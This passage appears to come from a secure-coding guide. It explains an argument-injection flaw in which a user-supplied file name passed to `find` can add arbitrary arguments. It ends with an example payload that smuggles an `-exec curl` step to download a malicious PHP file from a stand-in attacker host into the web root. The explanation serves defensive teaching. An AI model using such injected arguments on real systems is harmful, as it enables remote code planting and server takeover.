The following code uses the `find` command and expects the user to enter the
name of a file to find on the system.

It is vulnerable to argument injection because untrusted data is
inserted in the arguments of a process call without prior validation or
sanitization. +
Here, the application ignores that a user-submitted parameter might contain
special characters that will tamper with the expected system command behavior.

In this particular case, an attacker might add arbitrary arguments to the `find`
command for malicious purposes. For example, the following payload will download
malicious software on the application's hosting server.

----
 -exec curl -o /var/www/html/ http://evil.example.org/malicious.php ;
----